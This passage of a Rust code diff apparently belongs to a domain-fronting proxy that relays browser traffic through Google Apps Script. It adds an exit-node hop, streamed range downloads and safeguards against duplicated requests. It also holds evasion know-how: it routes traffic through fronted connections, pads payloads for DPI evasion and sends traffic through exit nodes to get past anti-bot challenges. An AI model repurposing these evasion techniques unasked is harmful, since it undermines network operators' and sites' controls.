+                .h2_round_trip(
+                    send.clone(),
+                    "GET",
+                    &target,
+                    &host,
+                    Bytes::new(),
+                    None,
+                    response_deadline,
+                )
+                .await;
+            (status, hdrs, body) = match hop {
+                Ok(triple) => triple,
+                Err((err, _)) => {
+                    self.poison_h2_if_gen(generation).await;
+                    self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+                    return Err((err, RequestSent::Maybe));
+                }
+            };
+        }
+
+        // Reached only when every round trip above returned Ok.
+        self.h2_calls.fetch_add(1, Ordering::Relaxed);
+        Ok((status, hdrs, body))
+    }
+
     /// Relay an HTTP request through Apps Script.
     /// Returns a raw HTTP/1.1 response (status line + headers + body) suitable
     /// for writing back to the browser over an MITM'd TLS stream.
@@ -563,15 +1755,65 @@ impl DomainFronter {
             url
         };
 
-        // Range requests are partial-content responses; caching or
-        // coalescing them against a non-range key would be catastrophic
-        // (wrong bytes for the wrong consumer). The range-parallel
-        // downloader calls `relay()` concurrently with N different Range
-        // headers for the same URL, and absolutely needs each call to go
-        // to the relay independently. Simplest correct answer: if any
-        // Range header is present, skip cache and coalesce entirely.
-        let has_range = headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range"));
-        let coalescible = is_cacheable_method(method) && body.is_empty() && !has_range;
+        // Exit-node short-circuit: route through the configured second-hop
+        // relay (Deno Deploy / fly.io / etc.) for hosts that need a
+        // non-Google exit IP. The cache + coalesce layer below is bypassed
+        // for these — exit-node-eligible hosts are the ones with active
+        // anti-bot challenges (CF Turnstile, ChatGPT login, Claude.ai,
+        // grok.com), and serving cached responses across users for those
+        // would be wrong (auth tokens, session state, per-user
+        // personalization). Falls back to the regular Apps Script relay
+        // if the exit node fails (network error, 5xx from the exit node, etc.)
+        // so a misconfigured or down exit node doesn't take the user
+        // offline for the sites that DON'T need it.
+        if self.exit_node_matches(url) {
+            let t0 = Instant::now();
+            match self.relay_via_exit_node(method, url, headers, body).await {
+                Ok(bytes) => {
+                    self.record_site(
+                        url,
+                        false,
+                        bytes.len() as u64,
+                        t0.elapsed().as_nanos() as u64,
+                    );
+                    return bytes;
+                }
+                Err(e) if !e.is_retryable() => {
+                    // The exit node may have already processed this
+                    // request (h2 post-send failure on a POST etc.).
+                    // Don't fall through to the direct path — that
+                    // would re-send to the same destination via Apps
+                    // Script and duplicate the side effect.
+                    tracing::warn!(
+                        "exit node failed for {} and request was already sent ({}); not falling back to direct Apps Script",
+                        url,
+                        e,
+                    );
+                    self.relay_failures.fetch_add(1, Ordering::Relaxed);
+                    let inner = e.into_inner();
+                    self.record_site(url, false, 0, t0.elapsed().as_nanos() as u64);
+                    return error_response(502, &format!("Relay error: {}", inner));
+                }
+                Err(e) => {
+                    tracing::warn!(
+                        "exit node failed for {}: {} — falling back to direct Apps Script",
+                        url,
+                        e
+                    );
+                    // fall through to the regular relay path below
+                }
+            }
+        }
+
+        // Range requests are partial-content responses; caching or
+        // coalescing them against a non-range key would be catastrophic
+        // (wrong bytes for the wrong consumer). The range-parallel
+        // downloader calls `relay()` concurrently with N different Range
+        // headers for the same URL, and absolutely needs each call to go
+        // to the relay independently. Simplest correct answer: if any
+        // Range header is present, skip cache and coalesce entirely.
+        let has_range = headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range"));
+        let coalescible = is_cacheable_method(method) && body.is_empty() && !has_range;
         let key = if coalescible { Some(cache_key(method, url)) } else { None };
         let t_start = Instant::now();
 
@@ -641,36 +1883,105 @@ impl DomainFronter {
     ///      defined, and the user-sent-Range-header case is handled
     ///      by relay() already (we skip cache for it).
     ///   2. Probe with `Range: bytes=0-<chunk-1>`.
-    ///   3. 200 back (origin doesn't support ranges) → return as-is.
-    ///   4. 206 back → parse Content-Range total. If the body fits in
-    ///      the first probe (total <= chunk or body >= total), rewrite
-    ///      the 206 to a 200 so the client — which never asked for a
+    ///   3. 200 back (origin doesn't support ranges) → write as-is.
+    ///   4. 206 back → parse Content-Range total. If Content-Range says
+    ///      the entity fits in the first probe, rewrite the 206 to a 200
+    ///      so the client — which never asked for a
     ///      range — doesn't choke on a stray Partial Content. (x.com
     ///      and Cloudflare turnstile in particular reject unsolicited
     ///      206 on XHR/fetch.)
     ///   5. Else: compute the remaining ranges, fetch them with
-    ///      bounded concurrency, stitch, return as 200.
+    ///      bounded concurrency. Two output modes:
+    ///        * `total ≤ APPS_SCRIPT_BODY_MAX_BYTES` (buffered): stitch
+    ///          all chunks into one `Vec<u8>`, transform the response
+    ///          head, write to caller in one shot. On chunk failure,
+    ///          fall back to a single GET — Apps Script can deliver
+    ///          the file in one piece up to its ~40 MiB cap. Safety
+    ///          net intact.
+    ///        * `total > APPS_SCRIPT_BODY_MAX_BYTES` (streaming): write
+    ///          the response head with `Content-Length: total` and the
+    ///          probe body straight to the client, then stream each
+    ///          remaining chunk to the client as it arrives in order.
+    ///          No buffered fallback (we've already committed bytes on
+    ///          the wire), but single-GET fallback wouldn't fit through
+    ///          Apps Script for files this size anyway — streaming with
+    ///          truncation on hard chunk failure beats today's 25s
+    ///          timeout + 504 (#1042).
     ///
-    /// If any later chunk fails validation or fetch, we fall back to the
-    /// probe's single-chunk response as a graceful-degradation, but we do
-    /// not stitch unchecked bytes into a fake full-success response.
-    pub async fn relay_parallel_range(
+    /// `transform_head` lets the caller rewrite the response head block
+    /// (e.g. CORS injection) without coupling this module to the
+    /// caller's policy. The input is the head bytes from "HTTP/1.x …"
+    /// through the trailing `\r\n\r\n`; the output should be the same
+    /// shape. Pass an identity closure if no rewrite is needed.
+    pub async fn relay_parallel_range_to<W, F>(
         &self,
+        writer: &mut W,
         method: &str,
         url: &str,
         headers: &[(String, String)],
         body: &[u8],
-    ) -> Vec<u8> {
+        transform_head: F,
+    ) -> std::io::Result<()>
+    where
+        W: tokio::io::AsyncWrite + Unpin,
+        F: Fn(&[u8]) -> Vec<u8>,
+    {
+        self.do_relay_parallel_range_to(
+            writer,
+            method,
+            url,
+            headers,
+            body,
+            &transform_head,
+            /*streaming_allowed=*/ true,
+        )
+        .await
+    }
+
+    /// Shared dispatch for [`Self::relay_parallel_range_to`] (streaming
+    /// enabled) and [`Self::relay_parallel_range`] (the `Vec<u8>`
+    /// compatibility wrapper, streaming disabled).
+    ///
+    /// When `streaming_allowed=false`, the function refuses the
+    /// streaming branch even when the response is large enough to
+    /// warrant it — instead falling back to a plain `self.relay()`
+    /// single GET, matching the pre-1.9.23 wrapper contract that a
+    /// `Vec<u8>` return must never be a fake-200 with the
+    /// `Content-Length` of the full advertised total but only a
+    /// prefix of the body (Issue #162). The streaming branch can
+    /// commit head + partial body before discovering a chunk
+    /// failure; that's correct for a wire writer (download client
+    /// sees Content-Length mismatch, retries via Range from the
+    /// partial position) but a buffered `Vec<u8>` consumer has no
+    /// way to react to the truncation, so we keep them off that
+    /// path entirely.
+    #[allow(clippy::too_many_arguments)]
+    async fn do_relay_parallel_range_to<W, F>(
+        &self,
+        writer: &mut W,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+        transform_head: &F,
+        streaming_allowed: bool,
+    ) -> std::io::Result<()>
+    where
+        W: tokio::io::AsyncWrite + Unpin,
+        F: Fn(&[u8]) -> Vec<u8>,
+    {
         const MAX_PARALLEL: usize = 16;
         let chunk = RANGE_PARALLEL_CHUNK_BYTES;
 
         if method != "GET" || !body.is_empty() {
-            return self.relay(method, url, headers, body).await;
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
         // If the client already sent a Range header, honour it as-is —
         // don't second-guess a caller that knows what bytes they want.
         if headers.iter().any(|(k, _)| k.eq_ignore_ascii_case("range")) {
-            return self.relay(method, url, headers, body).await;
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
         // Probe with the first chunk.
@@ -680,13 +1991,15 @@ impl DomainFronter {
 
         let (status, resp_headers, resp_body) = match split_response(&first) {
             Some(v) => v,
-            None => return first,
+            None => {
+                return write_response_with_head_transform(writer, &first, &transform_head).await
+            }
         };
 
         if status != 206 {
             // Origin returned the whole thing (or an error). Either way,
             // pass through.
-            return first;
+            return write_response_with_head_transform(writer, &first, &transform_head).await;
         }
 
         let probe_range = match validate_probe_range(status, &resp_headers, resp_body, chunk - 1)
@@ -697,64 +2010,127 @@ impl DomainFronter {
                     "range-parallel: probe returned invalid 206 for {}; falling back to single GET",
                     url,
                 );
-                return self.relay(method, url, headers, body).await;
+                let raw = self.relay(method, url, headers, body).await;
+                return write_response_with_head_transform(writer, &raw, &transform_head).await;
             }
         };
         let total = probe_range.total;
 
         if total <= chunk || (probe_range.end + 1) >= total {
-            return rewrite_206_to_200(&first);
+            let raw = rewrite_206_to_200(&first);
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
-        let total_usize = match checked_stitched_range_capacity(total) {
-            Some(v) => v,
-            None => {
-                tracing::warn!(
-                    "range-parallel: Content-Range total {} for {} is too large; falling back to single GET",
+        // Range planning is lazy via `plan_remaining_ranges` — a hostile
+        // origin can advertise `Content-Range: bytes 0-262143/<huge>` and
+        // pass the probe checks (matching 256 KiB body, claimed total >
+        // probe end), so eagerly building a `Vec<(u64, u64)>` for the
+        // full plan would let it drive arbitrary allocations on the
+        // stream branch (a 100 TiB advertised total at 256 KiB chunks
+        // is ~400M tuples, ~6 GB). PR #151's original `MAX_STITCHED_…`
+        // guard prevented this on the buffered side; lazy iteration
+        // preserves that protection for streaming without imposing a
+        // hard ceiling on legitimate large downloads.
+        let probe_end = probe_range.end;
+        let expected_chunks = (total - probe_end - 1).div_ceil(chunk);
+
+        // Branch: buffered stitch (fallback-safe) vs. streaming vs.
+        // single-GET fallback for the compat wrapper. See
+        // `dispatch_range_response` doc for the per-caller contract.
+        match dispatch_range_response(total, streaming_allowed) {
+            RangeDispatch::Stream => {
+                tracing::info!(
+                    "range-parallel-stream: {} bytes total, {} chunks after probe, up to {} in flight",
+                    total, expected_chunks, MAX_PARALLEL,
+                );
+                let fetches = self.fetch_chunks_stream(
+                    url,
+                    headers,
+                    plan_remaining_ranges(probe_end, total, chunk),
+                    total,
+                    MAX_PARALLEL,
+                );
+                return stream_range_response_to(
+                    writer,
+                    &resp_headers,
+                    resp_body,
                     total,
+                    fetches,
+                    transform_head,
                     url,
+                )
+                .await;
+            }
+            RangeDispatch::FallbackSingleGet => {
+                // `Vec<u8>` wrapper above 64 MiB: stream branch is
+                // off-limits (truncate-then-Err can't be reacted to),
+                // so we fall back to a single GET — same path the
+                // pre-1.9.23 wrapper took above its 64 MiB cap. Apps
+                // Script will typically return 502/504 because the
+                // response exceeds its delivery ceiling, but that's
+                // the contract: callers see Apps Script's error, not
+                // a half-written success.
+                tracing::info!(
+                    "range-parallel: {} bytes total > {} buffered cap and streaming disallowed; falling back to single GET",
+                    total, BUFFERED_STITCH_MAX_BYTES,
                 );
-                return self.relay(method, url, headers, body).await;
+                let raw = self.relay(method, url, headers, body).await;
+                return write_response_with_head_transform(writer, &raw, transform_head).await;
+            }
+            RangeDispatch::RejectTooLarge => {
+                // Quota-DoS guard: refuse the response. Streaming
+                // an advertised 16 GiB+ total would issue ~65 k
+                // chunk Apps Script calls (~daily quota on the free
+                // tier) per pwned URL — see `MAX_STREAMED_RANGE_BYTES`.
+                // 502 is the right status: this is upstream-induced
+                // refusal, not a client error.
+                tracing::warn!(
+                    "range-parallel: refusing {} bytes total for {} — exceeds {} streaming cap",
+                    total, url, MAX_STREAMED_RANGE_BYTES,
+                );
+                let raw = error_response(
+                    502,
+                    "Advertised Content-Range total exceeds relay's streaming \
+                     ceiling. The origin reported a size larger than the relay \
+                     is willing to fetch through Apps Script; refusing to spend \
+                     daily quota on a likely-hostile or buggy origin.",
+                );
+                return write_response_with_head_transform(writer, &raw, transform_head).await;
+            }
+            RangeDispatch::Buffered => {
+                // Fall through to the buffered stitch code below.
             }
-        };
-
-        // Plan remaining ranges after what the probe already returned.
-        let mut ranges: Vec<(u64, u64)> = Vec::new();
-        let mut start = probe_range.end + 1;
-        while start < total {
-            let end = (start + chunk - 1).min(total - 1);
-            ranges.push((start, end));
-            start = end + 1;
         }
 
         tracing::info!(
             "range-parallel: {} bytes total, {} chunks remaining after probe, up to {} in flight",
-            total, ranges.len(), MAX_PARALLEL,
+            total, expected_chunks, MAX_PARALLEL,
         );
 
+        // Buffered stitch. `total` is bounded above by
+        // `BUFFERED_STITCH_MAX_BYTES` (64 MiB) for the `Vec<u8>`
+        // wrapper path and by `APPS_SCRIPT_BODY_MAX_BYTES` (40 MiB)
+        // for the writer-based API — see `dispatch_range_response`.
+        // Either way, well inside `usize` even on 32-bit targets, and
+        // the lazy range iterator produces at most ~256 tuples for a
+        // 64 MiB total at 256 KiB chunks, so collecting results into
+        // `Vec<_>` for stitching is cheap.
+        let total_usize = total as usize;
+
         // Concurrent fetch with `buffered` — preserves input order
         // (important for stitching) and caps in-flight count. Each task
         // calls back into `relay()`, which already has retry + fan-out
         // wiring on single-request granularity; we don't duplicate
         // those here.
-        use futures_util::stream::{self, StreamExt};
-        let url_owned = url.to_string();
-        let base_headers = headers.to_vec();
-        let fetches = stream::iter(ranges.into_iter())
-            .map(|(s, e)| {
-                let url = url_owned.clone();
-                let mut h = base_headers.clone();
-                // Force a single Range header — if the caller's headers
-                // somehow already had one we wouldn't be here, but be
-                // defensive anyway.
-                h.retain(|(k, _)| !k.eq_ignore_ascii_case("range"));
-                h.push(("Range".into(), format!("bytes={}-{}", s, e)));
-                async move {
-                    let raw = self.relay("GET", &url, &h, &[]).await;
-                    (s, e, extract_exact_range_body(&raw, s, e, total))
-                }
-            })
-            .buffered(MAX_PARALLEL)
+        use futures_util::stream::StreamExt;
+        let fetches = self
+            .fetch_chunks_stream(
+                url,
+                headers,
+                plan_remaining_ranges(probe_end, total, chunk),
+                total,
+                MAX_PARALLEL,
+            )
             .collect::<Vec<_>>()
             .await;
 
@@ -765,31 +2141,142 @@ impl DomainFronter {
             match chunk {
                 Ok(chunk) => full.extend_from_slice(&chunk),
                 Err(reason) => {
+                    // Issue #162: silently rewriting the probe to a 200
+                    // here truncates the response to whatever the probe
+                    // saw (typically 256 KiB — the chunk size). Browsers
+                    // see HTTP 200 + Content-Length=262144 and treat
+                    // the download as complete; users reported "every
+                    // file capped at 256 KB" because every download
+                    // that hit this failure path landed there. Common
+                    // triggers: Apps Script stripping Content-Range,
+                    // origin returning 200-instead-of-206 on later
+                    // chunks, total mismatch across chunks. Correct
+                    // recovery is a fresh single GET — Apps Script
+                    // fetches the full URL up to its ~40 MiB cap. Slow
+                    // for big files vs. the parallel path but produces
+                    // a complete response, which is what matters.
                     tracing::warn!(
-                        "range-parallel: invalid chunk {}-{} for {} ({}); falling back to probe response",
-                        start,
-                        end,
-                        url,
-                        reason,
+                        "range-parallel: invalid chunk {}-{} for {} ({}); falling back to single GET",
+                        start, end, url, reason,
                     );
-                    return rewrite_206_to_200(&first);
+                    let raw = self.relay(method, url, headers, body).await;
+                    return write_response_with_head_transform(writer, &raw, &transform_head)
+                        .await;
                 }
             }
         }
 
         if (full.len() as u64) != total {
+            // Same fallback rationale as the chunk-validation case
+            // above: returning the probe truncates to 256 KiB. Single
+            // GET is the only way to give the user a complete file
+            // when the parallel stitch can't be trusted.
             tracing::warn!(
-                "range-parallel: stitched {}/{} bytes for {}; falling back to probe response",
+                "range-parallel: stitched {}/{} bytes for {}; falling back to single GET",
                 full.len(), total, url,
             );
-            return rewrite_206_to_200(&first);
+            let raw = self.relay(method, url, headers, body).await;
+            return write_response_with_head_transform(writer, &raw, &transform_head).await;
         }
 
         // Build a 200 OK with Content-Length = full body length. Drop
         // the Content-Range header (no longer applicable) and
         // Transfer-Encoding/Content-Encoding (origin already decoded
         // what we got; we ship plain bytes).
-        assemble_full_200(&resp_headers, &full)
+        let raw = assemble_full_200(&resp_headers, &full);
+        write_response_with_head_transform(writer, &raw, &transform_head).await
+    }
+
+    /// Backward-compatible wrapper around `relay_parallel_range_to`
+    /// that buffers the full response into a `Vec<u8>` before
+    /// returning. Retained so downstream callers (and external
+    /// consumers of `mhrv-rs` as a library) that depend on the pre-
+    /// 1.9.23 `-> Vec<u8>` signature keep working without code
+    /// changes. New code should prefer `relay_parallel_range_to`,
+    /// which streams large files chunk-by-chunk instead of buffering
+    /// the response in memory.
+    ///
+    /// **Pre-1.9.23 contract preservation:** for responses above the
+    /// buffered ceiling (`BUFFERED_STITCH_MAX_BYTES`, 64 MiB) the
+    /// wrapper deliberately falls back to a single `relay()` call
+    /// rather than taking the streaming branch. Streaming commits a
+    /// `200 OK` head with `Content-Length: <total>` plus a partial
+    /// body before discovering chunk failures — that's correct for a
+    /// wire writer (download client retries via Range) but exactly
+    /// the "fake-truncated-success" contract violation from Issue
+    /// #162 once the bytes are collected into a buffer the caller
+    /// can't react to. Wrapper callers therefore see the same upper
+    /// bound on response size and the same fallback semantics they
+    /// had before 1.9.23; only the failure surface changes (502/504
+    /// from Apps Script for the >40 MiB case, same as before).
+    pub async fn relay_parallel_range(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Vec<u8> {
+        let mut buf: Vec<u8> = Vec::new();
+        let identity = |head: &[u8]| head.to_vec();
+        // Writing to a `Vec<u8>` through `VecAsyncWriter` never fails
+        // (no I/O), so the `io::Result` from the writer-based API is
+        // always `Ok` here — modulo the streaming branch's chunk-
+        // validation error path. Disabling streaming
+        // (`streaming_allowed=false`) keeps the wrapper off that
+        // path, so the only `Err` cases left are unreachable for
+        // `VecAsyncWriter`.
+        let _ = self
+            .do_relay_parallel_range_to(
+                &mut VecAsyncWriter(&mut buf),
+                method,
+                url,
+                headers,
+                body,
+                &identity,
+                /*streaming_allowed=*/ false,
+            )
+            .await;
+        buf
+    }
+
+    /// Build the concurrent fetch stream used by both the buffered and
+    /// streaming branches of `relay_parallel_range_to`. Each yielded
+    /// item is `(start, end, Result<chunk_body, validation_reason>)`
+    /// in input order (via `buffered`, which preserves order while
+    /// capping in-flight count). Splitting this out keeps the
+    /// branching at the call site small and lets tests for the
+    /// streaming writer use a synthetic `Stream` with no
+    /// `DomainFronter` dependency.
+    fn fetch_chunks_stream<'a, I>(
+        &'a self,
+        url: &str,
+        base_headers: &[(String, String)],
+        ranges: I,
+        total: u64,
+        max_parallel: usize,
+    ) -> impl futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)> + 'a
+    where
+        I: IntoIterator<Item = (u64, u64)> + 'a,
+        I::IntoIter: 'a,
+    {
+        use futures_util::stream::{self, StreamExt};
+        let url_owned = url.to_string();
+        let base_h = base_headers.to_vec();
+        stream::iter(ranges)
+            .map(move |(s, e)| {
+                let url = url_owned.clone();
+                let mut h = base_h.clone();
+                // Force a single Range header — if the caller's headers
+                // somehow already had one we wouldn't be here, but be
+                // defensive anyway.
+                h.retain(|(k, _)| !k.eq_ignore_ascii_case("range"));
+                h.push(("Range".into(), format!("bytes={}-{}", s, e)));
+                async move {
+                    let raw = self.relay("GET", &url, &h, &[]).await;
+                    (s, e, extract_exact_range_body(&raw, s, e, total))
+                }
+            })
+            .buffered(max_parallel)
     }
 
     async fn relay_uncoalesced(
@@ -859,14 +2346,50 @@ impl DomainFronter {
         // Fan-out path: fire N instances in parallel, return first Ok, cancel
         // the rest. Clamps to number of available script IDs so the single-ID
         // case is a no-op even if parallel_relay>1 was configured.
+        //
+        // `select_ok` cancels the loser futures, but those futures only own
+        // our side of the I/O (TLS write, response read) — the Apps Script
+        // server has no idea the racing Rust task is gone, so every fan-out
+        // call still completes server-side and Apps Script's
+        // `UrlFetchApp.fetch()` to the destination still fires. For
+        // **non-idempotent** methods (POST / PUT / PATCH / DELETE) this
+        // surfaces as duplicate writes at the destination — a comment
+        // posted twice, a vote double-counted, a payment double-charged.
+        //
+        // Reported in #743: parallel_relay=2 + a POST to GitHub created
+        // two issue comments per submission. Same root cause as the
+        // SAFE_REPLAY_METHODS guard in Code.gs's `_doBatch` fallback —
+        // safe methods are idempotent, so re-firing is at worst wasteful;
+        // unsafe methods can have side effects, so re-firing is incorrect.
+        //
+        // Drop to sequential for non-idempotent methods regardless of
+        // `parallel_relay` setting. Users keep p95 wins on browsing /
+        // GET-heavy traffic (the common case) and don't lose correctness
+        // on form submits.
+        let method_safe_for_fanout = is_method_safe_for_fanout(method);
         let fan = self.parallel_relay.min(self.script_ids.len()).max(1);
-        if fan >= 2 {
+        if fan >= 2 && method_safe_for_fanout {
             return self.do_relay_parallel(method, url, headers, body, fan).await;
         }
 
-        // Sequential path: one retry on connection failure.
+        // Sequential path: one retry on connection failure, *unless*
+        // the failure is `FronterError::NonRetryable` — that wrapper
+        // says "the request may have already reached the server, do
+        // not duplicate." Without this guard, an h2 post-send failure
+        // on a non-idempotent method (POST/PUT/PATCH/DELETE) that the
+        // h2 layer correctly refused to replay on h1 would be
+        // re-issued here anyway, defeating the safety policy.
         match self.do_relay_once(method, url, headers, body).await {
             Ok(v) => Ok(v),
+            Err(e) if !e.is_retryable() => {
+                tracing::warn!(
+                    "relay attempt 1 failed and is non-retryable ({}); not duplicating {} {}",
+                    e,
+                    method,
+                    url,
+                );
+                Err(e.into_inner())
+            }
             Err(e) => {
                 tracing::debug!("relay attempt 1 failed: {}; retrying", e);
                 self.do_relay_once(method, url, headers, body).await
@@ -924,9 +2447,102 @@ impl DomainFronter {
         headers: &[(String, String)],
         body: &[u8],
     ) -> Result<Vec<u8>, FronterError> {
-        let payload = self.build_payload_json(method, url, headers, body)?;
+        // Build once, wrap in Bytes (zero-copy move). h2 takes a clone
+        // (Arc bump, not memcpy); h1 fallback uses the same Bytes via
+        // `Deref<Target = [u8]>`. Saves a full payload allocation+copy per call
+        // — meaningful on range-parallel fan-out where N copies fire
+        // in parallel for one user-facing GET.
+        let payload: Bytes = Bytes::from(self.build_payload_json(method, url, headers, body)?);
         let path = format!("/macros/s/{}/exec", script_id);
 
+        // h2 fast path: one shared TCP/TLS connection multiplexes all
+        // streams.
+        //
+        // The h2 layer reports `RequestSent::No` when it can prove
+        // the request never reached Apps Script (ensure_h2 unavailable,
+        // ready/back-pressure timeout, send_request error). In that
+        // case we fall through to h1 unconditionally — there's no
+        // duplication risk.
+        //
+        // For `RequestSent::Maybe` (anything after send_request
+        // succeeded) we only fall through for HTTP-idempotent methods.
+        // POST / PUT / PATCH / DELETE get wrapped in
+        // `FronterError::NonRetryable` so `do_relay_with_retry`'s
+        // outer retry also skips replay — without that wrap, the
+        // outer retry would re-issue the request anyway and the
+        // safety policy would be illusory.
+        match self
+            .h2_relay_request(
+                &path,
+                payload.clone(),
+                Duration::from_secs(H2_RESPONSE_DEADLINE_DEFAULT_SECS),
+            )
+            .await
+        {
+            Ok((status, _hdrs, _resp_body)) if is_h2_fronting_refusal_status(status) => {
+                // Edge rejected the fronted h2 request before
+                // forwarding to Apps Script. Sticky-disable h2,
+                // log once, fall through to h1 — this request is
+                // safe to replay because it never reached Apps Script.
+                self.sticky_disable_h2_for_fronting_refusal(
+                    status,
+                    &format!("relay {} {}", method, url),
+                )
+                .await;
+                // fall through to h1
+            }
+            Ok((status, _hdrs, resp_body)) => {
+                if status != 200 {
+                    let body_txt = String::from_utf8_lossy(&resp_body)
+                        .chars()
+                        .take(200)
+                        .collect::<String>();
+                    if should_blacklist(status, &body_txt) {
+                        self.blacklist_script(&script_id, &format!("HTTP {}", status));
+                    }
+                    return Err(FronterError::Relay(format!(
+                        "Apps Script HTTP {}: {}",
+                        status, body_txt
+                    )));
+                }
+                return parse_relay_json(&resp_body).map_err(|e| {
+                    if let FronterError::Relay(ref msg) = e {
+                        if looks_like_quota_error(msg) {
+                            self.blacklist_script(&script_id, msg);
+                        }
+                    }
+                    e
+                });
+            }
+            Err((e, RequestSent::No)) => {
+                tracing::debug!("h2 pre-send failure: {} — falling back to h1", e);
+            }
+            Err((e, RequestSent::Maybe)) => {
+                if is_method_safe_for_fanout(method) {
+                    tracing::debug!(
+                        "h2 post-send failure for safe method {}: {} — falling back to h1",
+                        method,
+                        e
+                    );
+                } else {
+                    tracing::warn!(
+                        "h2 post-send failure for non-idempotent {} {}: {} — \
+                         marking non-retryable to prevent duplicating side effects",
+                        method,
+                        url,
+                        e
+                    );
+                    // NonRetryable wrapper bubbles all the way through
+                    // do_relay_once_with → do_relay_with_retry, where
+                    // the retry loop skips its second attempt. Without
+                    // this wrap, returning a plain Err would let
+                    // do_relay_with_retry re-issue the request via h1
+                    // (or a fresh h2 cell), defeating the safety policy.
+                    return Err(FronterError::NonRetryable(Box::new(e)));
+                }
+            }
+        }
+
         let mut entry = self.acquire().await?;
         let reuse_ok = {
             let write_res = async {
@@ -1024,6 +2640,245 @@ impl DomainFronter {
         }
     }
 
+    /// Send a request through the configured exit node, chained inside
+    /// an Apps Script call. Path:
+    ///
+    /// ```text
+    /// client → SNI rewrite → Apps Script (Google IP)
+    ///        → UrlFetchApp.fetch(exit_node_url)
+    ///        → exit node (non-Google IP)
+    ///        → fetch(real_url)
+    ///        → response back through both layers
+    /// ```
+    ///
+    /// Apps Script sees the outer call (URL = exit_node_url, method =
+    /// POST, body = inner relay JSON authenticated with the exit-node
+    /// PSK). The exit node sees the inner JSON, fetches the real
+    /// destination, returns a `{s, h, b}` JSON envelope. Apps Script
+    /// returns that envelope as the body of its raw HTTP response
+    /// (because we set `r: true`). We then unwrap one extra layer:
+    /// extract Apps Script's body → parse the exit-node JSON → reconstruct
+    /// the destination's raw HTTP response so the rest of the proxy
+    /// pipeline (MITM TLS write-back) sees the same shape it gets from
+    /// the regular path.
+    async fn relay_via_exit_node(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Result<Vec<u8>, FronterError> {
+        let inner_json = self.build_exit_node_inner_payload(method, url, headers, body)?;
+
+        // The outer payload is just a normal Apps Script relay request
+        // pointing at the exit-node URL with POST + the inner JSON as body.
+        // Reusing build_payload_json keeps the outer envelope consistent
+        // with everything else (including the random padding for DPI
+        // evasion). The `r: true` flag in RelayRequest makes Code.gs
+        // return exit-node's raw HTTP response, which is what we want to
+        // unwrap below.
+        let exit_url = self.exit_node_url.clone();
+        let outer_headers = vec![(
+            "Content-Type".to_string(),
+            "application/json".to_string(),
+        )];
+        let outer_payload: Bytes = Bytes::from(
+            self.build_payload_json("POST", &exit_url, &outer_headers, &inner_json)?,
+        );
+
+        // Send the outer payload through the relay machinery and get back
+        // Apps Script's response body (which is exit-node's JSON envelope).
+        let app_body = self
+            .send_prebuilt_payload_through_relay(outer_payload)
+            .await?;
+
+        // exit-node's JSON envelope: {s: u16, h: {...}, b: "<base64>"} on
+        // success, {e: "..."} on its own internal error.
+        parse_exit_node_response(&app_body)
+    }
+
+    /// Build the inner-layer payload that the exit node will execute.
+    /// Same wire shape as a normal `RelayRequest` (`{k, m, u, h, b, ct, r}`)
+    /// but `k` is the exit-node PSK rather than the user's Apps Script
+    /// `auth_key`, and we skip the random-padding field — padding only
+    /// helps DPI evasion on the Iran-side leg, which the inner payload
+    /// is invisible to (it's encrypted inside the Apps Script HTTPS
+    /// connection that the ISP can't inspect).
+    fn build_exit_node_inner_payload(
+        &self,
+        method: &str,
+        url: &str,
+        headers: &[(String, String)],
+        body: &[u8],
+    ) -> Result<Vec<u8>, FronterError> {
+        let filtered = filter_forwarded_headers(headers);
+        let hmap = if filtered.is_empty() {
+            None
+        } else {
+            let mut m = serde_json::Map::with_capacity(filtered.len());
+            for (k, v) in &filtered {
+                m.insert(k.clone(), Value::String(v.clone()));
+            }
+            Some(m)
+        };
+        let b_encoded = if body.is_empty() {
+            None
+        } else {
+            Some(B64.encode(body))
+        };
+        let ct = if body.is_empty() {
+            None
+        } else {
+            find_header(headers, "content-type")
+        };
+        let req = RelayRequest {
+            k: &self.exit_node_psk,
+            m: method,
+            u: url,
+            h: hmap,
+            b: b_encoded,
+            ct,
+            r: false, // the exit node returns its own JSON envelope, not raw HTTP
+        };
+        Ok(serde_json::to_vec(&req)?)
+    }
+
+    /// Drive the standard script-id rotation + TLS pool send path with
+    /// a payload we already built. Mirrors `do_relay_once_with` but
+    /// returns the **raw response body bytes** (Apps Script's HTTP body)
+    /// instead of running the body through `parse_relay_json` — the
+    /// exit-node path needs to peel off exit-node's JSON envelope, which
+    /// has a different shape from Code.gs's raw-HTTP wrapping.
+    async fn send_prebuilt_payload_through_relay(
+        &self,
+        payload: Bytes,
+    ) -> Result<Vec<u8>, FronterError> {
+        let script_id = self.next_script_id();
+        let path = format!("/macros/s/{}/exec", script_id);
+
+        // h2 fast path. The exit-node outer call is always POST and
+        // carries the inner relay payload — replaying on h1 after the
+        // outer reached Apps Script duplicates the inner request to
+        // the exit node. Only fall back when h2 definitely never sent.
+        // Same default response deadline as the direct path; the
+        // exit-node leg ultimately exits via Apps Script too.
+        match self
+            .h2_relay_request(
+                &path,
+                payload.clone(),
+                Duration::from_secs(H2_RESPONSE_DEADLINE_DEFAULT_SECS),
+            )
+            .await
+        {
+            Ok((status, _hdrs, _resp_body)) if is_h2_fronting_refusal_status(status) => {
+                // Same fronting-refusal path as the direct relay.
+                // Safe to fall back: 421 means the edge rejected
+                // before invoking the exit node.
+                self.sticky_disable_h2_for_fronting_refusal(
+                    status,
+                    "exit-node outer call",
+                )
+                .await;
+                // fall through to h1
+            }
+            Ok((status, _hdrs, resp_body)) => {
+                if status != 200 {
+                    let body_txt = String::from_utf8_lossy(&resp_body)
+                        .chars()
+                        .take(200)
+                        .collect::<String>();
+                    return Err(FronterError::Relay(format!(
+                        "Apps Script HTTP {} (exit-node outer call): {}",
+                        status, body_txt
+                    )));
+                }
+                return Ok(resp_body);
+            }
+            Err((e, RequestSent::No)) => {
